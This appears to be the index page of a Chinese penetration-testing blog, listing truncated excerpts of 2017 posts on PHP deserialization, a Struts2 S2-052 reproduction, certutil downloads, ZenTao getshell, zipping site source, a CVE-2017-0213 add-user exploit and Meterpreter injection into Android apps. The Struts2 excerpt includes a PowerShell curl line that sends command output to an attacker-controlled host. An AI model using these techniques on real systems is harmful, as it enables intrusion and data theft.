php反序列小记

时间:2017-10-21   作者:webbaozi   分类: 小技巧   热度:33°    
时间:2017-10-21   分类: 小技巧    热度:33  
存在反序列漏洞的php代码 <html> <head> <title>WEB</title> </head> <body> <?php class Readflag{ var $file; function __destruct(){ if(isset($this->file)){ echo file_get_contents($this->file); } } function __wakeup(){ if($this->fi...

阅读全文>>

struts2-02-052复现笔记

时间:2017-9-6   作者:webbaozi   分类: 小技巧   热度:238°    
时间:2017-9-6   分类: 小技巧    热度:238  
网上已经有很多复现过程了,这里就做个笔记 vps上执行: python -m SimpleHTTPServer 8080 然后执行命令powershell "curl http://ip:port/index.php?whoami=$(whoami)" powershell支持curl(测试机win7powershell不支持curl,未测) POST /struts2-rest-showcase/orders/4 HTTP/1.1 Host: 192.168.1.212 User-Agen...

阅读全文>>

渗透测试中的certutil

时间:2017-8-10   作者:webbaozi   分类: 小技巧   热度:385°    
时间:2017-8-10   分类: 小技巧    热度:385  
0x00 前言 最近在Casey Smith‏ @subTee的twitter上学到了关于certutil的一些利用技巧。本文将结合自己的一些经验,介绍certutil在渗透测试中的应用,对cmd下downloader的实现方法作补充,总结base64编码转换的常用方法。 学习地址: https://twitter.com/subTee/status/888101536475344896 https://twitter.com/subTee/status/888071631528235010 0x01 简介 本文...

阅读全文>>

禅道后台getshell,利用windows特性,快速确定文件名

时间:2017-7-31   作者:webbaozi   分类: 小技巧   热度:305°    
时间:2017-7-31   分类: 小技巧    热度:305  
如何上传文件请移步:http://www.webbaozi.com/dmsj/18.html 这里就不多讲了 window特性: 双引号(""") <==> 点号(".")'; 大于符号(">") <==> 问号("?")'; 小于符号("<") <==> 星号("*")'; 进入正题: index.php ?m=editor &f=edit &filePath=YWFh &action=override &isExtends...

阅读全文>>

使用PHP自带zlib函数打包网站源码下载zip

时间:2017-7-20   作者:webbaozi   分类: 小技巧   热度:312°    
时间:2017-7-20   分类: 小技巧    热度:312  
打包网站源码使用,当不能执行命令时,有些大马由于写法问题,导致不能一次下载所有源码,所以从网上摘抄了代码做了下简单的修改。 代码如下: <?php //获取文件列表 function list_dir($dir){ $result = array(); if (is_dir($dir)){ $file_dir = scandir($dir); foreach($file_dir as $file){ if ($file == '.' || $file == '..'){ ...

阅读全文>>

热门 CVE-2017-0213添加用户

时间:2017-6-16   作者:webbaozi   分类: 安全工具   热度:952°    
时间:2017-6-16   分类: 安全工具    热度:952  
代码摘取:https://github.com/WindowsExploits/Exploits/blob/master/CVE-2017-0213/Source/CVE-2017-0213.cpp 源代码新建一个cmd窗口,改了下直接添加用户。 使用说明: 直接运行exe成功会添加用户 用户名:webbaozi 密码:[email protected]#123 win7测试x64(其他系统以及x86请自测): 下载地址: 链接: https://pan.baidu.com/s/1o8iD...

阅读全文>>

kwetza - 向 Android 应用中注入 Meterpreter payload 的 Python 脚本

时间:2017-6-13   作者:webbaozi   分类: 实用工具   热度:448°    
时间:2017-6-13   分类: 实用工具    热度:448  
Getting the code Firstly get the code: git clone https://github.com/sensepost/kwetza.git Kwetza is written in Python and requires BeautifulSoup which can be installed using Pip: pip install beautifulsoup4 Kwetza requires Apktool to be install and accessible via your PATH. This ...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1    
00:00 / 00:00
随机播放